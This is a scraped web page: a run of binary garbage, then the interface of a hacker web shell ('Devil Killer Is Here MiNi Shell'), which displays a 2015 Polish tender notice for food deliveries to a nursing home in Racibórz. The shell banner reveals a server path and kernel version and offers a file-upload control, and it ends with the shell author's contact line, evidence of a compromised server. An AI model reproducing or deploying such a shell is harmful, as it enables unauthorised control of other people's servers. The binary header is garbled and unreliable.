JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151117/308648-N-2015.html

<p class="kh_header"><b>Racibórz: Dostawa różnych produktów spożywczych</b><br>
<b>Numer ogłoszenia: 308648 - 2015; data zamieszczenia: 17.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Złota Jesień" , ul. Grzonki 1, 47-400 Racibórz, woj. śląskie, tel. 032 4152001, faks 032 4152001.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa różnych produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa różnych produktów spożywczych  dla DPS Złota Jesień w asortymencie i ilości jak niżej:
Lp.	Nazwa asortymentu	j.m.	ilość
1.	Budyń  35 - 45 g,  różne smaki	szt	1.000
2.	Cukier kryształ	kg	2.000
3.	Cukier puder	kg	15
4.	Cukier waniliowy 30 - 35 g	szt	400
5.	Galaretki owocowe 75 - 79 g , różne smaki	szt	1.000
6.	Herbata miętowa, torebki 1,2g , pakowana po 20 szt	szt	300
7.	Herbata rozpuszczalna 300g, różne smaki	szt	700
8.	Kakao extra ciemne, łatwo rozpuszczalne o wyraźnym smaku i aromacie,  zawartość tłuszczu co najmniej  10g  w 100g , opakowanie  80g-100g	szt	80
9.	Kasza gryczana w torebkach	kg	200
10.	Kasza jęczmienna	kg	200
11.	Kasza manna	kg	200
12.	Kawa Inka rozpuszczalna 150g	szt	600
13.	Kawa naturalna mielona 250 g	szt 	40
14.	Kawa naturalna rozpuszczalna 100g	szt	60
15	Makaron domowy( rosołowy) nitka cięta,  co najmniej 
2- jajeczny opakowanie 250 g	kg	350
16	Makaron domowy drobny :gwiazdki lub muszelka ,jajeczny
opakowanie 250 g	kg	200
17	Mąka pszenna	kg	700
18	Mąka ziemniaczana	kg	100
19	Płatki owsiane	kg	150
20	Płatki ryżowe 180- 200g	szt	20
21	Ryż	kg	500
22	Sól	kg	20
23	Suchary bez cukru 280g- 300 g	szt	20
24	Chrzan tarty  160-200 g	szt	180
25	Ketchup  łagodny 500g	szt	180
26	Musztarda     450- 500 g	szt	80
27	Miód 25 g	szt	4.000
28	Ocet 10 %  0,5 litra	szt	50
29	Olej uniwersalny 0,8l -1 litr	szt	380
30	Bazylia     10 g	szt	30
31	Czosnek granulowany  15-20g	szt	30
32	Gałka muszkatołowa mielona 15g-20g	szt	20
33	Kwasek cytrynowy 50 g	szt	200
34	Liść laurowy  5g - 7g	szt	180
35	Majeranek  8g-10g	szt	80
36	Papryka mielona 15g-20g	szt	50
37	Pieprz naturalny 20g	szt	200
38	Pieprz ziołowy 15g-20g	szt	40
39	Proszek do pieczenia  30g	szt	20
40	Przyprawa typu  Jarzynka  200 g	szt	700
41	Przyprawa do grilla klasyczna w tubie 80-100g	szt	30
42	Tymianek  10g-15g	szt	30
43	Zioła prowansalskie  10g-15g	szt	30
44	Żelatyna 50 g 	szt	80
45	Rodzynki 100 g	szt	20
46	Wiórki kokosowe 100g	szt	20
47	Ananas w plastrach puszka 550g-600g	szt	20
48	Brzoskwinia połówki puszka 800g-900g	szt	30
49	Groszek konserwowy puszka 400g	szt	180
50	Fasola szparagowa konserwowa, słoik 450 g	szt	500
51	Kukurydza konserwowa puszka 400g	szt	70
52	Koncentrat pomidorowy 30% 800g -1 kg	szt	120
53	Ogórek konserwowy słoik 0,8l-0,9l	szt	400
54	Papryka konserwowa słoik 0,8l-0,9l	szt	250
55	Pieczarki konserwowe słoik 0,8l-0,9l	szt	80
56	Kompot wiśniowy 0,8l-0,9l	szt	800
57	Kompot śliwkowy 0,8l-0,9l	szt	800
58	Kompot czarna porzeczka 0,8l-0,9l	szt	800
59	Kompot truskawkowy 0,8l-0,9l	szt	800
60	Napój owocowy 0,20 l 	szt	2.000
61	Sok owocowy 0,20 l 	szt	3.000
62	Sok na bazie marchewki 0,30 -0,33 l różne smaki	szt	500
63	Sok owocowy 1l ( pomarańcz, jabłko)	szt	250
64	Syrop owocowy 400-450g	szt	100
65	Woda mineralna niegazowana 1,5 l	szt	3.000
66	Woda mineralna niegazowana 0,5 l	szt	200
67	Pasztet drobiowy 50 g 
zawartość produktów  drobiowych co najmniej 30%	szt	3.000
68	Herbata ekspresowa czarna toreb. 1,4g -1,5g pakowana po 80- 100szt  torebek, po zaparzeniu klarowna o wyraźnym smaku i aromacie  np.: Saga, Posti	szt	400
69	Herbata z dzikiej róży, toreb. 2g pakowana po 25 torebek, po zaparzeniu klarowna o wyraźnym smaku i aromacie 
 np.: Saga, Biofix	szt	200
70	Makaron łazankowy wykonany z wysokiej jakości pszenicy (zawart. pszenicy durum) po ugotowaniu odpowiednio twardy, sprężysty, wartość energet. w 100g 350 -365 kcal -  np. Lubella, Sorenti, Malma, Mediterranea	kg	150
71	Makaron świderki wykonany z wysokiej jakości pszenicy (zawart. pszenicy durum) po ugotowaniu odpowiednio twardy, sprężysty, wartość energet. w 100g 350 -365 kcal -  np. Lubella, Sorenti, Malma,Mediterranea	kg	150
72	Makaron kolanka  wykonany z wysokiej jakości pszenicy (zawart. pszenicy durum) po ugotowaniu odpowiednio twardy, sprężysty, wartość energet. w 100g  350 -365 kcal -  np. Lubella, Sorenti, Malma, Mediterranea	kg	150
73	Płatki kukurydziane wysokiej jakości, złociste, chrupiące,  zawartość  kukurydzy co najmniej 98 %, wartość odżywcza w 100g  co najmniej 370kcal opak. 250g- 1 kg, np. Corn Flakes Nestle, 	kg	100
74	Majonez  400-420 ml wartość odżywcza w 100g 690- 740 kcal - np. Winiary, Hellmanns	szt	280
75	Koncentrat pomidorowy 30% bez konserwantów 200 g -np. Pudliszki , Łowicz, Rolnik	szt	200
76	Płynna przyprawa do zup, sosów, sałatek o wyraźnym aromacie i smaku 960-1040g np.: Winiary, Maggi, Knorr	szt	400

Ilości w/w asortymentu są przewidywana wielkością zamówienia. W uzasadnionych przypadkach przedmiot zamówienia może być realizowany w mniejszym zakresie. Maksymalna wielkość opakowań w przypadku produktów sypkich wynosi 1 kg, makaronu w poz. 70-72 do 2 kg, pozostałe produkty zgodnie z opisem. Wszystkie artykuły powinny być wysokiej jakości, pierwszego gatunku, pierwszej klasy, w opakowaniach oznaczonych zgodnie z przepisami ustawy z dnia 25 sierpnia 2006 r.o bezpieczeństwie żywności i żywienia. W pozycjach od 68 -76 dokładniej opisano poszczególne artykuły i przykładowo określono marki - producenta produktów, zamawiający dopuszcza zaproponowanie produktów innego producenta -marki o równoważnych  walorach jakościowych, odżywczych i smakowych  tj. nie gorszych niż opisane dla poszczególnych produktów.
Dostawy zamawiający będzie realizował sukcesywnie średnio raz w tygodniu , w dniu roboczym. Każdą partię dostawy zamawiający będzie uzgadniał telefonicznie z wykonawcą. Dostawca zamówiony towar będzie dostarczał do siedziby zamawiającego własnym transportem na swój koszt w godz. od 7:00 -14:00.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">próbki  produktów  wraz z  opisem tych produktów ( wartości odżywcze, składniki itp.) w przypadku, gdy wykonawca zaproponuje produkty równoważne w poz.68-76 formularza cenowego .</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferty, formularz cenowy ( wg wzoru zał. nr 1, 1A do SIWZ), 
pełnomocnictwa ( jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza waloryzację cen jednostkowych zaproponowanych w ofercie przez wykonawcę,  jednak nie wcześniej niż po upływie 3 miesięcy obowiązywania umowy w oparciu o 
wskaźnik  cen towarów i usług  konsumpcyjnych publikowany przez GUS, na wniosek wykonawcy. Konsekwencją ewentualnych zmian cen jednostkowych jest zmniejszenie ilości dostaw w ramach wartości umowy.
2. Zamawiający dopuszcza zamianę wartości brutto umowy w przypadku ustawowej zmiany podatku VAT dotyczącego przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatraciborski.pl/dps/dane_dps.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Złota Jesień  ul. Grzonki 1,  47-400 Racibórz,  sekretariat -  pok nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2015 godzina 10:00, miejsce: Dom Pomocy Społecznej  Złota Jesień ul. Grzonki 1,  47-400 Racibórz,  sekretariat -  pok nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie zamierza zawrzeć umowy ramowej. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com